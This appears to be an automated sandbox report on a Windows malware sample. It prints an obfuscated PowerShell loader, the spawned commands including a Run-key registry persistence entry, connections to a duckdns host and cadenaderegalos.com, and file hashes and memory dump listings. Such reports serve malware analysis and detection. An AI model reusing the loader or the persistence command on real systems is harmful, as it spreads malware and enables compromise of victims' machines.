'CivilisUBefohsfsBjergtoeBe,onkorforlyst-DykkedeAForflytgVicedireKassatin vsprintFllesud ';$Klippespalternes=Pugmiller27 'Recoillh StringtPist rstMercer pUninfri:Fright./tel mec/BrabblimWrannyfa LinenidPogoniaiOver apbBeraabea,lirtatrAn.iqueoMellemrhNonfluii.mpalealPejlevoaTermin lArithmoa Cari.ot BellahwTidssero Harpoo.VanddradPennefjuIsocy ncPaakldek Moorhed Selvbyn.sentrosMessing.Sele,ogomarkedsr Arti egKuldslo/L,vetraaOverspelMa,nedsl Fo,bru/ChristeOreassumvForgr beTikroner ethavepFoilingrBilophuoHar isttPrivataeUnkindlcDieucontTetraheeVilipendAuto.at.BrtternaPaduanisHurtigvdKnownsb>grundprhUnsu,pltReaffiltFreewompDren hesPamphar: Optje./ Kendin/Rigsar.csolilo a HelgesdFranckceLatinamnMundgodaOvercledcutleriePi,dymcr Forstre Vandfog Allitea.mhyggelHen,ikkoDiatonisGunsh t.IsagogicHortikuoKorskirm Fortri/HelmintO SamlinvIsoc ateForbo.sr kursusp Alc horDi,konioParopsitBrokkaseRegrassc KlebrntVaccinaeAchigandDmninge. DiskanaBal,erdsDampededMisc nc ';$Indeksnavnenes=Pugmiller27 'Horeu,g> Neckb. ';$Fiberizes=Pugmiller27 ' AsperiiUnderlaeUdslusax.ialogu ';$unfashionably='Underste';$Ndringsloven = Pugmiller27 'VernacueAntistrcFornufthKu.isshoEstabli Unlamen%YvindasaAfstr.spEvaporapFirspand K shmia CircumtStalagmaSolvarm%trichin\T gthusDFestdagrOuttopiothackerh Dronis.G.ggereL Bem.leiKonsul tDisbury Mimusop&unjo tl& Unrefr ExclusieP,ovedicPa aesthPholioto Boroca NonmanutHousebo ';Skuffemblers80 (Pugmiller27 ' Brevve$Sibyllig E.keltlasylth,oBo.genebAphanesaNonm.rrlstedfas: sermonRHjemvisaErgotizaTyp,husgPastelfeBrightnr BravoenSold teeOwl ike=unplaya(Overcolc mbitiomPaternid,ersali Idealit/ Sprackc tekedy Westli$System.NPhotomud registrDetermiiPistrixnTr.thsmgTomensvsThu.nidltilkendoSkarnbtvStyrekae.andelsn.ongres)R.ndvis ');Skuffemblers80 (Pugmiller27 'Gullery$BasilikgOntologll enabloMembranbCommulaaReprodulHjarnea:RuefulnI SaxaulnSkyd.spdBrugerdsDyrepareParkerinKbenhavs astodo=St dent$WummanaKU,etemallasterni.mutterpfam,etcpObjektke ApoteksS miwoopHolishkaPh tolalovergo,tFlberieeThirtyirMinisten,rydreheKn.vsmesNeder.e.AlarmsysChrist.pSt rgeolWhiteshiPr endetProsaen(Menings$K.lkulaIKvadratnIn.ectid AnteceeNonascekDigitissFortrngnPicturiaudbruddv SpulinnReguarde Positin Mowedee,pachets,acefor)Affodre ');$Klippespalternes=$Indsens[0];$Konstantnavn= (Pugmiller27 ',yrebes$Beboedeg A,rsoplObtestioLnniveab C ntriaHerm.lil Dr.van:K igsmaK Rec mpaDuksedrmBroekdee ,nderueFolk,krnApprokssWaiseja=OtogeniNSpi ekkeLangeelw T.angs-FlleskoOAlmachsb Raspedj SkittleKillybecKi,debatJordarv .dresseS i.deteyAgrologsJagterntSemiboue HissermSlu bet. SubfesNSubemareOmraadetSaliggr.UniseriWsh pyareOxytocib W stelCUneve,tlArkfdniiDaasellehave.usnreptilit');$Konstantnavn+=$Raagerne[1];Skuffemblers80 ($Konstantnavn);Skuffemblers80 (Pugmiller27 'Geother$W,odburKIntercaaSpytkirmMusicaleFormalieStoppegn,uperdesdiminut.snevejrHSammenseRewrit,a Nonundd Unskele Gtefolr brusqusSkattep[Desa in$C.rrupthOmbreudePlemoc,r Dobbelm DisomaaCalandeeIndif e]Saltant= Tri ul$Cons,raR krdderiSouthercPrognoshTe,moeleHalvakssMe.amor ');$Tripotassium=Pugmiller27 ' Pakist$NondecaKSpidsfiaComm.ndmEpriseteCorrespe MysticnTekstilsfkalieo.Beb,erdDUn,roroospan,shwWallisen JennielSelvbedoBrndvrdaInversedevadingFf stooniTrst.splGaulicwe.versig(grubers$Sad lecKM oledelH.lvstui krep,apGipsdeppJugglineGodken,sAngelinpScund ra SinterlRaffeeptOxamidie Gr.vkerBelaaninSugefiseIndrmmes Convey,Pupilla$ ,udekoUN.kedrmdUnabusilTilgodebBodenbesM.ddeltd Forjuda VasenbtAphrasioSprydsteUdsoninnVederhfsPloejer) Colpoh ';$Udlbsdatoens=$Raagerne[0];Skuffemblers80 (Pugmiller27 'Nabobye$UnsandagNonuncil OverdioKurs ikbtrianguaFore.oolBu dend:Aa.ningCLatou.saTempelrrI,ternayNonmen o Sp ntatFjernskiOleifernS,bstitsDiskva,=Preappe(ForvariTTomefuleExsectisChemophtEkvivok-PerduraP Samme aTranseqtF,rstrah Underg Detai l$SnkendeU Kal,kadP.oselylForktr,bc,nsumesHackersdcheckreaFaenometLovgi.no Zoo.eoeP etortnChaussfsantigra)Madrepo ');while (!$Caryotins) {Skuffemblers80 (Pugmiller27 'svineml$PirraurgBlas,rtlToldasso MarkrkbVariabeaCrassesl Udbeta:L.ppingEBeskuerkLu ningsSuba.paeBesty,emKunstkreWood,nltOmkldnis Fasci,=Bitters$.recooktSef kherBrandfouDgnmiddeFlels,s ') ;Skuffemblers80 $Tripotassium;Skuffemblers80 (Pugmiller27 'BugtedeSUnshaketGlanslsaHalberdrChaptalt.eposit- M chanSDyrtidslChyometeFimredeeEuorn,tp Ju,jub .frika4Optakts ');Skuffemblers80 (Pugmiller27 'Vandfor$TophuengLaconislDaysmeno GravhubGaintw,aHandbagl.igsadv:rrd.ummCStokerfaHeltenerLoranthyI.stalsoSammensttakstt.iRose.ben Unja ks P.ssma=Festrem(Bon efdTL,tfrdieFdevandsRv.ulletSkr ebl-UnassimP FormataYa.nerutauthorihBestemm Uninvag$InterpuUBathyspdudtrakdlHafterabElectros SeksaadStavlygaMilieu t ceneguoPrintm ePsykolonPred.spsAmorphi)Goldles ') ;Skuffemblers80 (Pugmiller27 'Lascivi$BlrenddgreusinglS,kterioHandlinb milliaa OmlgnilInterli:G eywarM.tdtrinaUdfrienrBullrags Briti h lomstmgatherfaMundat,nSemidom=Varnish$LeasinggScleroxlcompeteo ResaddbComplicaSpringbl Ko.sta:O.vejenBdisloadesto ebemImi ereospolet cObvia ikUnneedfeFunktiodCharc a+dehydre+Sovi ti%Immunes$BombardIAnge.linEhe,intdFolkboasBlousoneAnbefaln OptionsMisfie .l,kkericOrdtllioNattyfou atteagnLign ngtUigenne ') ;$Klippespalternes=$Indsens[$Marshman];}$Agonize=339107;$Simonies=30148;Skuffemblers80 (Pugmiller27 'Forlodc$T,rhildgRetrosplPolituro Undissb Ta,ernaShunpiklEngangs:RegenerUVgterpid lvfadm UdestorSrskrevkC lletyeIlliberl FlusmisDribleneKnibninnPedicel onaff=,oughta EverypG TrepaneNa.nemrtomphali- PonyerCbaggrunoBron efn C.rcumtSkrinlgeLarmedenfeberantKonst u Din.eno$UsurpatUAnkec.edForsatslOverflybrebokeasUnderstd Thiocya FrugivtMort,nsoCirrouseSamf,ndnG llaunsReagens ');Skuffemblers80 (Pugmiller27 'Rendezv$FiskestgScabblelKi esiooCae.arobFremskraVrikkerlLocater:TiggersqKontaktuStivelsoSutton,hSr,ilfloP,oduktg EvakuesChenea Reform=Instruk Forvaer[ PiscinSPleske.y Sombr sDemiskrtFodbreme LuggnamPost ox.OktanteCKv.rtetoFakturan.appeskvagariste statsgr ,ockettPlanlg.]Ga.rden:Tr oxaz:AbortioFTaabelirS bunguoInviolamOrtograBAthwarta fo,plisfir,steeUnfle,h6kope sa4 DialekSPuller t SigtekrBaggruniUnmaturnfrkapseg Iridin(Edder,o$Udlaan UGasserndPadouksmGrankogrJoeyshjkStemmeaeOutequilShillins Hy.ereeGetat,bnIndl.dt)Post or ');Skuffemblers80 (Pugmiller27 'Vowersk$ MeteorgSwankeyl BarbecoBe,iggebD,provia BalefulAutecol:P,emenoVTvr agseTysklanrArbejdsiFlaskehf Gaeld iNostradcLejeforeUnd.ferrMysticieRelik.irSax rne preio,i=Krepere Johnni,[KaalpaySPac.walyPromercsSkralunt dyrti,eAdditiomOssicul.sperminTGrothinePoly,ynxOctahedt opfind. Ko,torE SilentnFaradaycEpichoroUnexplod Unshari,vakuernFstendegNonchem]Grsrdde:Cardio,:BeskftiABaptistSBronchiC A ekseIOrlopdeISelvval. AlperoGTheow ee edagetUnblissSDob eltthjsangerNemmendiLod,ensnBrdteksgNor.eni(Hum.ris$Verna.uqSeaportu MicropoSvalinghSpl tteoBourgeogOrganiss Kontak)Kogespr ');Skuffemblers80 (Pugmiller27 'Jomsvi $videoplgReshuttlC remono SpolnibRooflinaFimre,elLastvog:PrinterAA,nsofin SkistatThenna.iBritas cRulammeiEdiblesvCivilisi Ch,orol Skuldr= Laanem$Salad nVHematozeMendicarRhabditiByggemof HuanaciProgrescSkummeteRaakalvrapert.reUngamblrSnobbis. Rel stsMiteredu N.drivb VoldtgsRee,ucatadmin,sr Reocc,iAarsagsnCommissgMantraf(,nlarge$ FeatheA Heterog fono.ooani,idinSkulpefiPlausibz S mmete betonk,Honilyj$FrostieSHuma.eaidattosrmhandf.sotolversnIrreguliSinistre RadiossPantheo)Jola,ta ');Skuffemblers80 $Anticivil;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 6777.6777.6777.677e udp
US 8.8.8.8:53 madibarohilalatwo.duckdns.org udp
DE 84.247.187.12:80 madibarohilalatwo.duckdns.org tcp
US 8.8.8.8:53 cadenaderegalos.com udp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp

Files

memory/2360-4-0x000007FEF67EE000-0x000007FEF67EF000-memory.dmp

memory/2360-6-0x0000000002320000-0x0000000002328000-memory.dmp

memory/2360-5-0x000000001B270000-0x000000001B552000-memory.dmp

memory/2360-7-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp

memory/2360-8-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp

memory/2360-9-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp

memory/2360-10-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp

memory/2360-11-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FNPSN90E19EQJP9QN7PC.temp

MD5 bc28d4197085ba776631dfb6b5a2a087
SHA1 e0949021a788b0fc103a4862ba9eb37f710d84f1
SHA256 03f800e75edc2a12cf107debf20d86f1dc67b7d244ff94656f13a96415f9ff50
SHA512 225a7583ca4bb8214cb9a5fe8cdab943d8eedcf480aa9c8d669fb9fe975d4e214163d7ac9f659ea25f22fe31d22d7d4dc8d58f9e75a7d6e92f13ef08bf104659

C:\Users\Admin\AppData\Roaming\Droh.Lit

MD5 1a958060ba3e3de4653959fe2fd1efd5
SHA1 c5d3a5646dc5920668f1f61c334c7c7d40c888b5
SHA256 268dacbaea80bdf0e4ffcbcf21ce4558988d4c77f2906d571a5a1b9db9dc17ab
SHA512 8ba4e481b0a08940a5423abc5d1e7ffa01e4aa185536af215a43e5d28ee025f5caf5355514b2a13f0565c42796e1bd864104878d79d086a82648b0733929c5d0

memory/2360-17-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp

memory/2360-18-0x000007FEF67EE000-0x000007FEF67EF000-memory.dmp

memory/596-19-0x0000000006330000-0x0000000008BF9000-memory.dmp

memory/2468-22-0x0000000000F30000-0x0000000001F92000-memory.dmp

memory/2360-27-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp